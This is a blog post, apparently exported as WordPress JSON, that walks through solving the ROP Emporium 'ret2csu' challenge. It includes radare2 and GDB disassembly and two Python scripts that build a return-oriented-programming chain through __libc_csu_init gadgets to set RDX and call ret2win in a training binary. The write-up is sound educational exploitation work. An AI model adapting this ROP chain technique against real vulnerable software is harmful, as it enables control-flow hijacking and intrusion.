{"id":1121,"date":"2019-12-20T09:52:13","date_gmt":"2019-12-20T14:52:13","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=1121"},"modified":"2019-12-20T10:13:42","modified_gmt":"2019-12-20T15:13:42","slug":"rop-emporium-ret2csu-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/rop-emporium-ret2csu-solution\/","title":{"rendered":"ROP Emporium | ret2csu Solution"},"content":{"rendered":"

We’re back in ret2win territory, but this time without the useful gadgets. How will we populate the rdx register without a pop rdx?<\/p>\n

The binary and challenge description can be found here:
\nhttps:\/\/ropemporium.com\/challenge\/ret2csu.html<\/a><\/p>\n

While this challenge seems simple on the surface, it actually required a bit more thought than I had anticipated. Mostly due to the different goals we’re hoping to achieve than what is described in challenge description’s recommended reading material. The goal here is simple, call ret2win() <\/span> with 0xdeadcafebabebeef<\/code> supplied as the 3rd function argument. For reference, in Linux x64 systems, we pass the first 3 function arguments in the following registers, respectively: RDI, RSI, RDX. The challenge description points you to a PDF describing the return-to-csu technique from BlackHat Asia 2018<\/a>. And while this was great for getting started, especially to see where some gadgets exist that aren’t found by tools like ropper<\/code>, a few extra steps were needed to complete the challenge. You’ll see what I’m talking about later.<\/p>\n

The binary simply asks for input:<\/p>\n

\r\nandrew ~\/ret2csu $ .\/ret2csu \r\nret2csu by ROP Emporium\r\n\r\nCall ret2win()\r\nThe third argument (rdx) must be 0xdeadcafebabebeef\r\n\r\n> test\r\n<\/pre>\n
The main hurdle here is to get a specific value into RDX without any useful gadgets that ropper<\/code> can find:<\/p>\n
\r\nandrew ~\/ret2csu $ ropper --file ret2csu --search "pop rdx"\r\n[INFO] Load gadgets from cache\r\n[LOAD] loading... 100%\r\n[LOAD] removing double gadgets... 100%\r\n[INFO] Searching for gadgets: pop rdx\r\n\r\nandrew ~\/ret2csu $ ropper --file ret2csu --search "mov rdx"\r\n[INFO] Load gadgets from cache\r\n[LOAD] loading... 100%\r\n[LOAD] removing double gadgets... 100%\r\n[INFO] Searching for gadgets: mov rdx\r\n<\/pre>\n
The “return-to-csu” paper linked to by the challenge description tells us where to start. With the __libc_csu_init() <\/span>function. This function comes as “attached code” that is conveniently not randomized when ASLR is enabled. Let’s take a look at the disassembly in radare2:<\/p>\n
\"\"<\/p>\n
Now, one thing that tripped me up for a while here is that radare2 is not displaying all of the instructions. Do you see the two dots in the left margin? There’s supposed to be a few instructions indicating a loop here. Let’s take a look at the same function in GDB:<\/p>\n
\"\"<\/p>\n
For some reason, radare2 is not displaying the following instructions:<\/p>\n
\r\n   0x000000000040088d <+77>:    add    rbx,0x1\r\n   0x0000000000400891 <+81>:    cmp    rbp,rbx\r\n   0x0000000000400894 <+84>:    jne    0x400880 <__libc_csu_init+64>\r\n<\/pre>\n
I’ve submitted an issue on Github<\/a> for this. Because of that, I’ll be using GDB’s disassembly as these will be important later on. For now, let’s get started with building a ROP chain. There are 2 gadgets here to consider. The first one we can use to populate a few registers:<\/p>\n
\r\n   0x000000000040089a <+90>:    pop    rbx\r\n   0x000000000040089b <+91>:    pop    rbp\r\n   0x000000000040089c <+92>:    pop    r12\r\n   0x000000000040089e <+94>:    pop    r13\r\n   0x00000000004008a0 <+96>:    pop    r14\r\n   0x00000000004008a2 <+98>:    pop    r15\r\n   0x00000000004008a4 <+100>:   ret\r\n<\/pre>\n
The second can be used to populate a few more registers and call an arbitrary function:<\/p>\n
\r\n   0x0000000000400880 <+64>:    mov    rdx,r15\r\n   0x0000000000400883 <+67>:    mov    rsi,r14\r\n   0x0000000000400886 <+70>:    mov    edi,r13d\r\n   0x0000000000400889 <+73>:    call   QWORD PTR [r12+rbx*8]\r\n<\/pre>\n
Keep in mind that the primary goal here is to populate the RDX register with 0xdeadcafebabebeef<\/code>. In order to do that, we’ll need to use that \"pop r15\"<\/code> instruction to get that value into R15, followed by the \"mov rdx, r15\"<\/code> instruction. Then we have the \"call QWORD PTR [r12+rbx*8]\"<\/code> instruction. We can put whatever address we want into R12 and set RBX to 0. So my first thought was, let’s populate RDX with the necessary value and call ret2win()<\/span>. Easy, right?<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\n\r\n# Gadgets\r\n# 1) 0x40089a: pop rbx,rbp,r12,r13,r14,r15; ret\r\n# 2) 0x400880: mov rdx,r15; mov rsi,r14; mov edi,r13d; call qword [r12 + rbx*8]\r\n\r\np = lambda x: (x).to_bytes(8, "little")\r\n\r\nbuf  = b"A" * 40\r\nbuf += p(0x40089a)           # Gadget 1\r\nbuf += p(0)                  # RBX\r\nbuf += p(0)                  # RBP\r\nbuf += p(0x4007b1)           # R12 (ret2win())\r\nbuf += p(0)                  # R13 > RDI\r\nbuf += p(0)                  # R14 > RSI\r\nbuf += p(0xdeadcafebabebeef) # R15 > RDX\r\nbuf += p(0x400880)           # Gadget 2\r\n\r\nsys.stdout.buffer.write(buf)\r\n<\/pre>\n
Let’s give it a whirl:<\/p>\n
\r\nandrew ~\/ret2csu $ .\/exploit.py | .\/ret2csu \r\nret2csu by ROP Emporium\r\n\r\nCall ret2win()\r\nThe third argument (rdx) must be 0xdeadcafebabebeef\r\n\r\n> Segmentation fault (core dumped)\r\n<\/pre>\n
Of course it isn’t that easy. After doing some debugging and reflecting on my life choices, I realized that the \"call QWORD PTR [r12+rbx*8]\"<\/code> instruction isn’t directly calling the address we put in R12. The value “r12+rbx*8” is being de-referenced. It’s calling the address that this value points to. So the first thing I try, is searching for the address of ret2win() <\/span>in memory.<\/p>\n
\r\n[0x004005f0]> f~ret2win\r\n0x004007b1 128 sym.ret2win\r\n0x004008e1 15 str.Call_ret2win\r\n\r\n[0x004005f0]> \/v 0x4007b1\r\nSearching 3 bytes in [0x601058-0x601080]\r\nhits: 0\r\nSearching 3 bytes in [0x600e10-0x601058]\r\nhits: 0\r\nSearching 3 bytes in [0x400000-0x400ac8]\r\nhits: 0\r\n\r\n[0x004005f0]> pxQ 48 @ sym..dynamic\r\n0x00600e20 0x0000000000000001 section.+1\r\n0x00600e28 0x0000000000000001 section.+1\r\n0x00600e30 0x000000000000000c section.+12\r\n0x00600e38 0x0000000000400560 section..init\r\n0x00600e40 0x000000000000000d section.+13\r\n0x00600e48 0x00000000004008b4 section..fini\r\n\r\n[0x004005f0]> \/v 0x400560\r\nSearching 4 bytes in [0x601058-0x601080]\r\nhits: 0\r\nSearching 4 bytes in [0x600e10-0x601058]\r\nhits: 1\r\nSearching 4 bytes in [0x400000-0x400ac8]\r\nhits: 0\r\n0x00600e38 hit3_0 60054000\r\n<\/pre>\n
Of course, when a search fails, I perform another search that I know should find a match, just to make sure I’m doing it right. As you can see, the .dynamic<\/code> section holds addresses to the _init() <\/span>and _fini() <\/span>functions. This will be useful knowledge later. For now, let’s go back to the disassembly of __libc_csu_init() <\/span>and focus on these instructions:<\/p>\n
\r\n   0x0000000000400880 <+64>:    mov    rdx,r15\r\n   0x0000000000400883 <+67>:    mov    rsi,r14\r\n   0x0000000000400886 <+70>:    mov    edi,r13d\r\n   0x0000000000400889 <+73>:    call   QWORD PTR [r12+rbx*8]\r\n   0x000000000040088d <+77>:    add    rbx,0x1\r\n   0x0000000000400891 <+81>:    cmp    rbp,rbx\r\n   0x0000000000400894 <+84>:    jne    0x400880 <__libc_csu_init+64>\r\n   0x0000000000400896 <+86>:    add    rsp,0x8\r\n   0x000000000040089a <+90>:    pop    rbx\r\n   0x000000000040089b <+91>:    pop    rbp\r\n   0x000000000040089c <+92>:    pop    r12\r\n   0x000000000040089e <+94>:    pop    r13\r\n   0x00000000004008a0 <+96>:    pop    r14\r\n   0x00000000004008a2 <+98>:    pop    r15\r\n   0x00000000004008a4 <+100>:   ret\r\n<\/pre>\n
If I can make it from that first instruction to the last, I’ll be able to put whatever I want into RDX and set the next link in my ROP chain to the address of ret2win()<\/span>. What’ll it take? Well, I’ll need to call a function that doesn’t modify RDX and make it past that conditional jump. The conditional jump is easy. We’ll set RBP to 1 and RBX to 0. The instructions will add 1 to RBX, then compare the two. If they’re equal, the jump is not taken. My ROP chain will also need to account for the \"add rsp,0x8\"<\/code> instruction. That just means adding another 8-byte buffer value. The rest of the instructions pop values into various registers but do not modify RDX.<\/p>\n
Now, which function should I call? I need to make sure the function does not modify RDX, RBX, and RBP. It also needs to be a function which has its address already stored in memory somewhere. Turns out, _fini() <\/span>does pretty much nothing. And if you remember from earlier, its address is stored in the .dynamic<\/span> section:<\/p>\n
\r\n[0x004005f0]> pdf @ sym._fini\r\n            ;-- section..fini:\r\n            ;-- .fini:\r\n\u250c 9: sym._fini ();\r\n\u2502 bp: 0 (vars 0, args 0)\r\n\u2502 sp: 0 (vars 0, args 0)\r\n\u2502 rg: 0 (vars 0, args 0)\r\n\u2502           0x004008b4      sub rsp, 8\r\n\u2502           0x004008b8      add rsp, 8\r\n\u2514           0x004008bc      ret\r\n\r\n[0x004005f0]> pxQ 48 @ sym..dynamic\r\n0x00600e20 0x0000000000000001 section.+1\r\n0x00600e28 0x0000000000000001 section.+1\r\n0x00600e30 0x000000000000000c section.+12\r\n0x00600e38 0x0000000000400560 section..init\r\n0x00600e40 0x000000000000000d section.+13\r\n0x00600e48 0x00000000004008b4 section..fini\r\n<\/pre>\n
So the R12 register will need to be populated with the value 0x600e48<\/code>. Now I should have all the pieces to finish my ROP chain:<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\n\r\n# Gadgets\r\n# 1) 0x40089a: pop rbx,rbp,r12,r13,r14,r15; ret\r\n# 2) 0x400880: mov rdx,r15; mov rsi,r14; mov edi,r13d; call qword [r12 + rbx*8]\r\n\r\np = lambda x: (x).to_bytes(8, "little")\r\n\r\nbuf  = b"A" * 40\r\nbuf += p(0x40089a)           # Gadget 1\r\nbuf += p(0)                  # RBX\r\nbuf += p(1)                  # RBP\r\nbuf += p(0x600e48)           # R12 (pointer to _fini())\r\nbuf += p(0)                  # R13 > RDI\r\nbuf += p(0)                  # R14 > RSI\r\nbuf += p(0xdeadcafebabebeef) # R15 > RDX\r\nbuf += p(0x400880)           # Gadget 2\r\nbuf += p(0)                  # padding for "add rsp,0x8" instruction\r\nbuf += p(0)                  # RBX\r\nbuf += p(0)                  # RBP\r\nbuf += p(0)                  # R12\r\nbuf += p(0)                  # R13\r\nbuf += p(0)                  # R14\r\nbuf += p(0)                  # R15\r\nbuf += p(0x4007b1)           # ret2win()\r\n\r\nsys.stdout.buffer.write(buf)\r\n<\/pre>\n
This time, it should work, with or without ASLR \ud83d\ude42<\/p>\n
\r\nandrew ~\/ret2csu $ cat \/proc\/sys\/kernel\/randomize_va_space\r\n2\r\n\r\nandrew ~\/ret2csu $ .\/exploit.py | .\/ret2csu \r\nret2csu by ROP Emporium\r\n\r\nCall ret2win()\r\nThe third argument (rdx) must be 0xdeadcafebabebeef\r\n\r\n> ROPE{a_placeholder_32byte_flag!}\r\nSegmentation fault (core dumped)\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
We’re back in ret2win territory, but this time without the useful gadgets. How will we populate the rdx register without a pop rdx? … Continue readingROP Emporium | ret2csu Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-1121","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1121","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=1121"}],"version-history":[{"count":17,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1121\/revisions"}],"predecessor-version":[{"id":1139,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/1121\/revisions\/1139"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=1121"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=1121"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=1121"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}